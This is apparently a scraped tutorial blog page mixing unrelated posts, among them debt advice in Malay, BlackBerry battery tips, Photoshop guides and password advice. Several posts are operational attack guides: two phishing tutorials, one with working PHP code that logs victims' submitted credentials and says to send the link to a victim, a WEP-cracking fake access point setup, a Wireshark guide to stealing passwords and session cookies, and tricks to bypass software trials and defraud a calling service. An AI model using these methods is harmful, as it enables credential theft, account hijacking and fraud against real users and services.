Welcome

welcome to all visitors to the blog All Tutorials 4 You .. This blog is new again .. Our party would like to apologize for any kesulitaqn and defects in this blog, it is still in the renewal of the tap .. Please note

Facebook

welcome to all visitors to the blog All Tutorials 4 You .. This blog is new again .. Our party would like to apologize for any kesulitaqn and defects in this blog, it is still in the renewal of the tap .. Please note

Google

welcome to all visitors to the blog All Tutorials 4 You .. This blog is new again .. Our party would like to apologize for any kesulitaqn and defects in this blog, it is still in the renewal of the tap .. Please note

costaricawebstudio

welcome to all visitors to the blog All Tutorials 4 You .. This blog is new again .. Our party would like to apologize for any kesulitaqn and defects in this blog, it is still in the renewal of the tap .. Please note

Windows 8

welcome to all visitors to the blog All Tutorials 4 You .. This blog is new again .. Our party would like to apologize for any kesulitaqn and defects in this blog, it is still in the renewal of the tap .. Please note

Teknik Bebas Hutang Yang Ramai Orang Tidak Tahu!


Hutang kini menjadi satu penyakit berjangkit yang paling bahaya dalam masyarakat kita. Kerana hutang ramai yang hidup dalam tekanan, berserabut dan paling teruk ramai yang muflis kerananya.
Menurut kajian, hutang isi rumah yang dicatat berjumlah RM577 bilion berdasarkan statistik bulanan Bank Negara Malaysia merangkumi bebanan pinjaman kereta (RM118 bilion), pinjaman perumahan (RM225 bilion) dan pinjaman peribadi (RM22 bilion) selain anggaran hutang kad kredit (RM200 bilion). Pehh!!
Bebas Hutang – Rahsianya??
Berita baik sekarang saya akan menolong anda untuk bebas dari hutang! Oleh itu anda mempunyai duit lebih untuk menikmati hidup yang lebih baik. Dan saya buatkan satu sistem yang boleh anda ikut.
Biasanya sistem yang mudah adalah yang terbaik. Dan saya rasa ianya termasuk cara melenyapkan hutang. Dalam masa  beberapa tahun saya telah mencipta pelbagai sistem, dan saya akan memperkenalkan salah satu sistem saya yang terbaik kepada anda ;)
Anda perlu kuatkan semangat untuk mengikuti 10 langkah bebas hutang yang berikut. Dan matlamat anda untuk bebas daripada hutang pasti akan tercapai jika anda benar-benar komited untuk menyelesaikan segala hutang kad kredit, rumah, peralatan rumah dan sebagainya.
10 Langkah Bebas Hutang DiBongkar
1. PERIKSA rekod perbelanjaan untuk tempoh 12 bulan. Setahun adalah jangka masa yang tepat untuk melihat apa yang berlaku. Jadi lihat semua perbelanjaan, penyata
bank, rekod buku cek, penyata kad kredit atau apa sahaja rekod yang anda ada.  Dan untuk perbelanjaan yang menggunakan wang tunai, bawa buku nota untuk beberapa minggu dan tulis semua perbelanjaan anda, walaupun untuk membeli goreng pisang makcik Timah. Akhirnya, anda akan dapati betapa sedikit akan menjadi bukit. Saya
telah mencubanya dan memang boleh dapat angin akhmar… hehe
2. KIRAKAN jumlah perbelanjaan anda dalam sebulan, dengan mencampurkan semua bil yang perlu anda bayar dalam sebulan.
3. TULISKAN senarai hutang yang anda tanggung. Jangan lupa masukkan sekali ansuran rumah. Telefon bank jika anda tidak pasti berapa hutang yang anda ada.(Pastikan ada selalu kemas kinikan rekod senarai hutang ini)
4. BUAT SENARAI pembayaran minima yang perlu anda lakukan setiap bulan. Katakan anda perlu membayar RM1500 setiap bulan.
5. TENGOK BAKI yang perlu anda bayar, dengan anggapan bahawa anda membayar setiap bulan tanpa ada yang tertunggak.
6. SENARAIKAN hutang anda supaya hutang yang sedikit diatas sekali, dan yang banyak terletak dibawah. Jangan lupa senaraikan semua hutang anda. Contohnya:
1) Hutang TV RM3000
2) Hutang kad kredit RM5,000
3) Hutang kereta RM50,000
4) Hutang rumah RM100,000
7. SERANG HUTANG: Sekarang anda perlu ‘MENYERANG’ untuk membayar hutang yang sedikit dahulu. Buat keutamaan untuk habiskan hutang yang sedikit dahulu (tv?) dan akhir sekali hutang yang agak besar, contohnya kereta atau rumah.
8. PRINSIP 10%: Pada langkah Nombor 4, anda telah kirakan jumlah minima hutang yang perlu anda  bayar setiap bulan iaitu RM2000. Sematkan di minda anda untuk tambahkan sebanyak 10% daripada jumlah tersebut, iaitu RM200!
9. GANDAKAN: Untuk mempunyai tambahan RM200 untuk membayar hutang, kurangkan RM200 daripada perbelanjaan, dan simpan untuk membayar hutang.
Cuba fikirkan semua cara untuk mengumpulkan RM200 ini.  Anda perlu berbincang dengan keluarga anda apa yang perlu dan tidak perlu dibeli. Contohnya jika anda selalu makan diluar, cuba kurangkan. Jika anda merokok, cuba berhenti. Jika anda berusaha, pastinya anda temui jalan untuk jimatkan paling kurang RM200 sebulan.
10. BEBASKAN: Gunakan wang tambahan RM200 ini untuk membayar hutang No.1 anda yang kecil dahulu. Jika anda membayar RM100 sebelum ini, sekarang anda bayar RM300 (RM100+RM200). Apabila habis hutang pertama, gunakan RM300 untuk tambahkan bayaran kepada hutang kedua. Jika sebelum ini anda membayar RM200 untuk hutang kedua, anda bayar RM500 (RM200+RM300) selepas hutang pertama habis. Ianya akan memberikan impak maksima untuk melangsaikan
hutang anda dengan cepat. Teruskan penambahan sehingga ke senarai yang terakhir.
Dengan cara ini anda akan bebas dari hutang dalam masa beberapa tahun. Ianya tidak mudah tetapi paling kurang anda sudah mempunyai sistem untuk bebas daripada hutang. Kelebihan daripada sistem ini bermula hanya daripada RM200 yang anda jimatkan, dan ianya bertambah sebaik sahaja hutang pertama anda habis.
Saya sendiri telah gunakan teknik bebas hutang ini dengan jayanya dan sekarang saya mahu anda mencubanya. Dan jangan lupa untuk  menyimpan duit di ASB sebaik sahaja anda bebas dari hutang! Jangan lupa berikan komen jika anda mendapat sebarang hasil daripada teknik ini.  See ya!
Demi Kejayaan Anda,


PS: Dengan sistem saya, anda boleh hapuskan hutang dengan lebih cepat. Oleh itu anda tidak perlu lagi risau bagaimana nak bayar hutang setiap hujung bulan. Bayangkan jika tiada hutang, anda boleh simpan wang di ASB, melancong dan beli apa yang anda mahu. Ikut sistem langkah demi langkah BEBAS HUTANG DAN JADI KAYA DISINI!

How to make phishing page


Step 1- Firstly u must signup for a free web hosting service like:ill advice u to use t35 or 110mb. www.t35.com   www.110mb.com   www.ripway.com etc..... and register a domain or subdomain.
After getting your signup done, you have your own subdomain like for instance you register with 110mb then your domain is like www.yourname.110mb.com.

Step 2- Now Login to your 110mb account and go to "File Manager" in the 110mb control panel.

Step 3- Now what you have to do is, go to your domain folder like "yourname.110mb.com" and create a seperate folder in that directory with the name of the site, for eg. yahoo , if you want to phish a yahoomail account!

Step 4- Now extract the file you downloaded from http://ethicalspot.blogspot.com i.e. "phishing pages by eagle" to your desktop and then open your "yahoomail" folder. You'll find two files there viz. "eagle.php" & "index.htm" [ Each phisher folder contains same files]

Step 5- Now upload "eagle.php" & "index.htm" to the "yahoo" folder you created inside "yourname.110mb.com" So when you're done with the uploading part, the link to your yahoo phisher is www.yourname.110mb.com/yahoo/index.htm.

Step 6- Congrats!! That is your Yahoomail phisher!! Now all you have to do is copy the link to the phisher file i.e. www.yourname.110mb.com/yahoo/index.htm and send it to the victim you want to hack! When he/she'll open that link, it'll be directed to your yahoo phisher and when he/she logins that page  he/she'll be redirected to the original "YahooMail" website and you'll get the password in the "passes.txt" file which will be created in tha yahoo folder you created in your 110mb domain and the path to that file will be "www.yourname.110mb.com/yahoo/passes.txt" !


NOTE:DON'T RENAME THE FILE NAME eagle.php OTHERWISE IT WILL NOT WORK.

This is just for education purposes.I am not responsible if someone use this for wrong use.

click to download the phishing page of the website u want: -

CHANGE YOUR 110mb or t35 DIRECTORY PERMISSION TO 755 SO THAT NO ONE CAN VIEW YOUR PERSONAL FILES EXCEPT THE PHISHER!!

Blackberry Battery Power Saving Tips

 

Charging

    • Charge BlackBerry® smartphone as much as possible
    • Use wall chargers as the preferred charging method

Media

    • Reduce volume
    • Use headphones
    • Load media using the BlackBerry® Desktop Manager (Avoids resizing)
    • Turn off equalizer settings (Media – Options)

Browsing

    • Visit mobile sites where applicable
    • Turn Repeat Animations to a lower setting (Browser – Options – General Properties)
    • Close browser when finished using (close with ESC key, not red End key)

Screen/Keyboard

    • Reduce Backlight Timeout (Options – Screen/Keyboard)
    • Reduce Backlight Brightness (Options – Screen/Keyboard)
    • Holster smartphone (turns off LCD automatically)
    • Set Audible Roll to mute (Options – Screen/Keyboard)
    • Key Tone Off (Options – Screen/Keyboard)
    • Use a sleeve when storing the smartphone in a pocket

Network Connections

    • Turn off unused connections when not in use, i.e. GPS, Wi-Fi®, Bluetooth®
    • Use Auto On/Off
    • Use single mode only (1XEV, 2G only, 3G only)

Shortcuts

    • Use shortcuts instead of activating Java® menus (Browser – Options – Browser Configuration)

Camera

    • Turn off flash (Camera – Options)
    • Set picture size to Small (Camera – Options)
    • Set Color Effect to Normal (Camera – Options)
    • Set Picture Quality to Normal (Camera – Options)

Applications

    • When exiting, be sure to close the app, not leave it running in the background (close with ESC key, not red End key)
    • Log out of third-party applications when they are not needed (Instant Messaging, etc.)

Indicators

    • Set Audible notification to Off (Profiles)
    • Turn off coverage LED (Profiles)

GPS

    • Use the zoom out function to get the largest viewable area that you can still use usefully

Step by Step Guide on Connecting to a Wi-Fi Network Using Windows

Wireless Internet (Wi-Fi) zones are convenient, easy to access, and available to any device with a wireless adapter. Finding open wireless Internet is usually no problem in populated areas. In fact, airports, libraries, and cafés often advertise free Wi-Fi hotspots.

When you find an open Wi-Fi zone, you'll need to take a few simple steps in Windows 7 or Windows Vista to connect safely. Note that public Wi-Fi networks are typically unsecured, meaning that a determined attacker can follow everything you do while siphoning off your private information. While we recommend avoiding unsecured networks whenever possible, sometimes you just need to use one. Whether your network is secured or unsecured, follow these steps to connect:

Step by Step: In Windows 7

1. Click the network icon in the notification area to open the list of available networks. Alternatively, click the Windows Start button and open Control Panel; click Network and Internet; and then click Connect to a network (under Network and Sharing Center) to open the list of available networks.

2. Click the network to which you would like to connect.

3. Click the Connect button. If the network is security-enabled, you'll need to enter a security key obtained from the network administrator.

If this is the first time you are connecting to the network, you'll be prompted to choose a network location. A network location is a profile Windows uses to determine appropriate security settings. Always choose the Public network location when connecting to public Wi-Fi networks. You can change the location of any network you connect to by clicking Start, Control Panel, Network and Internet, Network and Sharing Center. Change the network location by clicking the network location below the network name.

Step by Step: In Windows Vista

1. Click the Windows Start button, then click Connect to. Alternatively, click Start, Control Panel, Network and Internet, Connect to a network (under Network and Sharing Center).

2. In the list of available networks, click the network to which you would like to connect.

3. Click the Connect button. If the network is security-enabled, you'll need to enter a security key (obtained from the network administrator).

Remember: Unsecured wireless networks--which many public Wi-Fi hotspots are--carry greater risk than secured (password-protected) wireless networks. Do not work with sensitive information while surfing on an open public network.

Wep0ff – Wireless WEP Key Cracker Tool

Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients.

It uses combination of fragmentation and evil twin attacks to generate
traffic which can be used for KoreK-style WEP-key recovery.

This tool can be used to mount fake access point attack against WEP-based wireless clients.

This code tested patched madwifi-old drivers with athraw support, but also works with madwifi-ng. With madwifi-ng you need to create two virtual interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).

How to Use:

1. Setup fake AP with KARMA tools or iwconfig

iwpriv ath0 mode 2
iwconfig ath0 mode master essid foo enc 1122334455 channel 7
echo 1 > /proc/sys/dev/ath0/rawdev
echo 1 > /proc/sys/dev/ath0/rawdev_type
ifconfig ath0
up ifconfig ath0raw up

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key

You can download it here:

Wep0ff

Hacking Password Protected Zip Files.

You thought you were smart. You would put a password on your zip file, Genius!

But now you have either lost the password or forgotten it.

The files are gone forever..right?

Nope, let me explain how to get the password and the files back. It's easy.

Difficulty: Moderate
Things you'll need: Brute Force Attack Program
You will need a brute force attack program that will try millions of passwords on the zip file until it gets the correct one. It can take minutes to months depending on how hard you made the password. You just have to think how important the files are to you.

I have personally forgotten my passwords before and used a brute force attack application to regain the password and the files in mere minutes.

So let's begin..

Finding a brute force attack application:

I searched Google for "zip password recovery" and found this application
http://www.topshareware.com/Atomic-Zip-Password-Cracker-download-37591.htm

You can look for others if this one is out of your price range or you want one with more features. Note you might see some that are free, give it a try.

You can also try searching for keywords like :
"hack zip file" "crack zip file:

Now that you have the brute force attack application you install it and set it to attack your locked zip file.

Thursday, April 21, 2011 How to enable Task Manager, Regedit, System Restore, MsConfig, Control Panel, Cmd, Run After a virus attack

That’s where tools like Re-Enable aid the user. The software programoffers to activate Windows features like Regedit, Windows Task Manager, System Restore, MsConfig or the Control Panel after a virus attack.

It displays all features in the main interface upon startup. Some or all of the apps and functions can be selected for fixing.



A click on the Re-enable button after the selection will start the recovery process.

The program offers a Tool menu on top that comes with additional troubleshooting utilities. Here it is possible to restore Safe Mode, edit Hosts files, reset files and folder attributes, unhide drives, repair the desktop, repair explorer.exe startup problems or scan for and delete autorun.inf files.

Re-Enable is a handy program to repair a system after a virus attack. The developer has created a lite version which requires the Microsoft .net Framework 3.5 SP1 and a portable version which has no dependencies but is 30 times the size of the lite version (700 KB to 22 MB).Download: Re-Enable

How To Use Trial Software's For Ever

One of  my blog readers asked me "How can i use trial version software's forever" .Instead of answering him i taught i can write a tutorial on How to use trial version software's for Ever

Concept :-
When you  install a software for the first time it makes an entry into the Windows Registry with details such as Installed Date and Time, installed path etc.After installation every time you run the software it compares the current system date and time with the installed date and time.So with this it can make out whether the trial period is expired or not. So if we make software think that the trial period is not over we can use the software for ever




How To Use Trial Version Software For Ever

Before we start the Hack Download Crack Lock from Here And follow the steps given below

1. Always note down the date and time, when you install a trial software for the first time.

2. Once the trial period expires, never open it
  
3. Now open Crack Lock which we downloaded earlier and select add program
    
4. Now navigate and select the trial software which you want to use it forever and  Inject  the date of the last day in the trial period.
 Example
 If the trial period expires on December  30 , always inject the date as December 29 
5. Follow the same steps to use any Trail version programs for ever

Note :- Once the trial period of the program expires never open it directly always open the program using crack lock 

Guidelines For Creating Strong Passwords

Its been a while since i wrote a Security article , Today i will be sharing some Guidelines For Creating  Strong Passwords .This article was originally written by lockdown.co.uk .and its been modified by me.

Choosing the right password is something that many people find difficult, there are so many things that require passwords these days And remembering them all can be a real
problem.Because of this a lot of people choose their passwords very badly. The simple tips given below are intended to assist you in choosing a good password



Guidelines For Creating Strong Passwords
The following are some Guidelines for creating a strong password

Basics
  • Use at least eight characters, the more characters the better really, but most people will find anything more than about 15 characters difficult to remember.
  • Use a random mixture of characters, upper and lower case, numbers, punctuation, spaces and symbols.
  • Don't use a word found in a dictionary, English or foreign.
  • Never use the same password twice.
Things to avoid
  • Don't just add a single digit or symbol before or after a word. e.g. "apple1"
  • Don't double up a single word. e.g. "appleapple"
  • Don't simply reverse a word. e.g. "elppa"
  • Don't just remove the vowels. e.g. "ppl"
  • Key sequences that can easily be repeated. e.g. "qwerty","asdf" etc.
  • Don't just garble letters, e.g. converting e to 3, L or i to 1, o to 0. as in "z3r0-10v3"
Tips
  • Choose a password that you can remember so that you don't need to keep looking it up, this reduces the chance of somebody discovering where you have written it down.
  • Choose a password that you can type quickly, this reduces the chance of somebody discovering your password by looking over your shoulder.
Bad Passwords
  • Don't use passwords based on personal information such as: name, nickname, birth date, wife's name, pet's  name, friends name, home town, phone number, social security number, car registration number,  address etc. This includes using just part of your name, or part of your birth date.
  • Don't use passwords based on things located near you. Passwords such as "computer", "monitor", "keyboard", "telephone", "printer", etc. are useless.
  • Don't ever be tempted to use one of those so common passwords that are easy to remember but offer no security at all. e.g. "password", "letmein".
  • Never use a password based on your user name, account name, computer name or email address.
Choosing a password
  • Use good password generator software.
  • Use the first letter of each word from a line of a song or poem.
  • Alternate between one consonant and one or two vowels to produce nonsense words. eg. "taupouti".
  • Choose two short words and concatenate them together with a punctuation or symbol character between the words. eg. "seat%tree"
Changing your password
  • You should change your password regularly, I suggest once a month is reasonable for most purposes.
  • You should also change your password whenever you suspect that somebody knows it, or even that they may guess it, perhaps they stood behind you while you typed it in.
  • Remember, don't re-use a password.

Protecting your password
  • Never store your password on your computer except in an encrypted form. Note that the password cache that comes with windows (.pwl files) is NOT secure, so whenever windows prompts you to "Save password" don't.
  • Don't tell anyone your password, not even your system administrator
  • Never send your password via email or other unsecured channel
  • Yes, write your password down but don't leave the paper lying around, lock the paper away somewhere, preferably off-site and definitely under lock and key.
  • Be very careful when entering your password with somebody else in the same room.

Remembering your password
Remembering passwords is always difficult and because of this many people are tempted to write them down on bits of paper. As mentioned above this is a very bad idea. So what can you do?
  • Use a secure password manager, see the downloads page for a list of a few that won't cost you anything.
  • Use a text file encrypted with a strong encryption utility.
  • Choose passwords that you find easier to remember.
Bad Examples
  • "fred8" - Based on the users name, also too short.
  • "christine" - The name of the users girlfriend, easy to guess
  • "kciredref" - The users name backwords
  • "indescribable" - Listed in a dictionary
Good Examples
None of these good examples are actually good passwords, that's because they've been published here and everybody knows them now, always choose your own password don't just use somebody Else's.
  • "mItWdOtW4Me" - Monday is the worst day of the week for me.
If you find  difficulty in selecting a password you can use this website  www.strongpasswordgenerator.com 
which automatically generates a strong password  for you, The website allows you to choose a  password length and also gives you hints through which you can easily  memorize the password


Hope this Information Helps ,If you Have any doubts Please be free to comment

Hacker High school -e Book Download

The Hacker High school project is the development of license-free, security and privacy awareness teaching materials and back-end support for teachers of elementary, junior high, and high school students.
Today's teens are in a world with major communication and productivity channels open to them and they don't have the knowledge to defend themselves against the fraud, identity theft, privacy leaks and other attacks made against them just for using the Internet. This is the reason for Hacker High school.



Herzog runs Hacker High school, a program to teach kids and teens security awareness and critical, Internet research skills. The program contains free security and privacy awareness teaching materials and back-end support for teachers of accredited elementary, junior high, and high schools. There are 12 workbooks, all in  English. These are lessons that challenge teens to be as resourceful as hackers, including safe Internet use, web privacy, using the Internet for research, avoiding viruses and Trojans, legalities and ethics, and more.
This is a great starting point for beginners to learn hacking Follow the steps given below to download this book

Hacker High school Security Awareness for Teens

1. First download this book from  Here

2. To get the password  click here

How to Make a Phisher/Fake Page For Any Website

I received many Emails from my blogger readers requesting me to make Fake /Phisher page for various websites like orkut ,twitter , GMail , Face book ...etc .I have already written some tutorials  on how to hack Face book , GMail using a fake/phishing page . But many had doubts , problems . To clear all there doubts  i taught i can write a tutorial on how to make your own fake/phisher page for any website that you want  Follow the steps given below to create your own phishing page




How to Make a Phisher/Fake Page For Any Website 

1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 
example :
              yahoo.html

2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 
"action = https.." and change the address to login.php and save it



3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php

<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address you can do it  by changing the www.yahoo.com to any  address you desire


4. Now we have to create a empty log file for this Open a notepad and save the empty file as log.txt

5. Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com 

6. Now upload all the three files which we created Yahoo.html , login.php ,log.txt  and change the file permissions for log.txt to 777 

7. Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , every thing will be stored in log.txt  ,you can open log.txt to see all the login details 


How to make Free Phone calls from your PC

Many of my blog readers where asking is there any way to make free phone calls from PC so i decided to share a few cool things like "How to make Free Phone calls from your PC to any Mobile or Landline phone " in the World". Its absolutely free i.e 100% free. So guys read on....


How to make Free Phone calls from your PC

First of all download FriendCaller from here.

After it is fully installed, open friend caller from desktop. Then register. I recommend you to use temporary email for the registration, like yopmail.com


Then go to your email and confirm your account and you will be credited $ 0.10 for free calls. So you can only call for 10 seconds for free but this what I made this tut so you can call free.

Now login with your account.


Then click on the phone icon.


Now comes the great part. Download a software called Cheat Engine from here.

Run the software and click on "Open Process".


Then click on window list.


Select friend caller, and open it.


Now dial number in friend caller. [First test your own number] and click call.

It will start ringing...


Now in Cheat Engine, enable speed hack. Edit speed to 0.00


Now enjoy your call. The timer will freeze. You can talk as much as you want. When you finish call, you will be only charged 0.02 but after your balance is finished, make new account and enjoy.

Best Port scanning Tools

What is port scanning? It is similar to a thief going through your neighborhood and checking every door and window on each house to see which ones are open and which ones are locked. similarly computers have ports form 1 to 3000 ports  for communication 

EG:-  


If these ports are not secure a hacker can communicate with these ports
and cause havoc The list given below are some of the best port scanners 
You can download from the links given below





Port Scanners
:
 


Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This 

 advanced port scanner has a number of useful arguments that gives user a lot of control over the  
 process.
 

Home:- http://www.insecure.org 
Latest Release:- Nmap 5.00
Download:- http://nmap.org/download.html 


Superscan :- A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It  includes a variety of additional networking tools such as ping, traceroute, http head, and   whois.


Latest Release:- SuperScan v4.0



Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic
 host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and  other pieces of information about the target hosts can be extended with a few plugins.
 

Home:- http://www.angryziber.com [sourceforge.net]
Latest Release:- IPScan 3.0-beta3
Download:- http://www.angryziber.com/w/Download 


Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information  gathering
and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application,  and component identification by analyzing responses.

Home:- http://www.unicornscan.org
Latest Release:- Unicornscan 0.4.7-2
Download:- http://www.unicornscan.org  

Wireshark Tutorial | Stealing Password And Cookie

As told earlier sniffers are widely used for stealing passwords and cookies so as a last part to wireshark tutorial I 'll roughly cover how you can do this. For this demonstration you'll need Mozilla Firefox web browser and Add-N-Edit Cookie add-on. After installing Firefox you can download add-on from following links. Once installed restart your browser,
you can access this add-on from tools menu.
Now first of all I 'll clear how you can steal passwords. Suppose you want to steal password of victim who has account on some http://www.abcxyz.com website then first of all open website on your own browser and view source code. If the site does not uses embedded java script for log-in then and only then you can capture password in plain text format. If URL of site contains https instead of http then all credentials will be encrypted before transmission and you'll not get any credentials. So if above conditions are met then start capturing packets.
Now click on Edit and select Find Packets, from find window select,
Find by: String
Search in: Packet details
and in string section value specified for password box. Since the action will be post while sending credentials, select a packet with POST in it. See packet details and you'll get user-name and password.
Now if the website uses embedded Java script or https you will not get password, in such cases find packets with word cookie. Copy all details about cookies in it, now open your Mozilla Firefox click on Tools and open Cookie Editor, select Add New and input all cookie details and you are done, you'll not need any password just log-in by typing website URL.

How to Change Skin Tone in Photoshop

PREVIEW

Before

Step 1

  • Duplicate layer
  • Set Blending mode to Soft Light at 100%
Step 1

Step 2

  • Go to Image > Adjustment > Selective Color...
  • Pick Black from the drop down, and then add 20% to Black from the spectrum
Step 2

Step 3

  • Select skin areas using Magic Wand Tool(Q)
  • Feather Selection (Alt+Ctrl+D) 5px then
  • Layer Via Copy (Ctrl+J) name it "skin"
Step 3

Step 4

  • Add an Curves adjustment layer (Curves) (Layer > New Adjustment Layer > Curves)
Add a Level layer...

Note: You can duplicate the layer if it isn't strong enough.

Then finally change the Hue/Saturation layer ...

Step 5

[image]
Add colour to the lips
  • Pick the Lasso Tool then draw the selection around her lip
  • Feather selection (5px)
  • Use Hue/Saturation module (Ctrl + U)

6.
And now, shade something ..
    -Stand on layer "skin"
    -Pick Burn Tool, darker some dark area ...

You see? these areas are so bright. Fix it now!!

     -Use EyeDropper, choose a skin tone color
     -Make new layer
     -Use Soft Brush draw into bright areas ( on new layer )
     -Change Blending mode = " Color "
     -Filter >> Blur >> Gaussian Blur ( 5 > 10 px )

Now, we need some tone color for this image
I choose warm tone
Add one more adjustment layer ( Photo Filter ) and set as I did ..

At last step, you should make a copy-of-merged-layer by using Image >> Apply Image ( on new blank layer )
Change mode = Screen, discount Opacity ..
You can use Dodge and Burn Tool to shading some skin areas are incorrect ...

This is stock photo

and this is last result !! Have fun :)

Results

Make up a girl

Open your girl stock
I choose this, it dark and so much  green

First, hit Ctrl + M or go to Image >> Adjustment >> Curve
Set Black and White point as i did, move the curve little up

it look brighter

Ctrl + U to open Hue/Saturation windows, set like this

yes, it okei, now  .. is the make-up step

Duplicate this layer, Gaussian Blur (Filter >> Blur >> Gaussian Blur ) it with 10 px

Change blending mode = Screen, 40 % opacity

make new layer, set Blending mode = Overlay, use soft brush with black and white color to draw

our result !

Use Magic Wand tool, hold Shift, and select all girl's skin areas

Feather selections

Curve ( Ctrl + M )

her skin look brighter

Merge all layer or make new layer and Apply Image, duplicate it, Gaussian Blur with 1 px, creat a layer mask, use Black Soft Brush to clear the area that you dont want to show

Make new layer, Apply Image again, then Filter >> Artistic >> Poster Edges, set parameter as I did, use layer mask clear some area

OK !! now creat the selection like this with Rectangular Marquee Tool, fill #000000 color

add a Lens Flare ( Filter >> Render >> Lens Flare )


Hue the backgorund ( must on new layer and using Layer Mask )

Another layer with 2 px Blur


use some Star Brushes, add text ... Done !! make-up complate :P
this Light and Flowing version

Cute version ( add some color tone )

Followers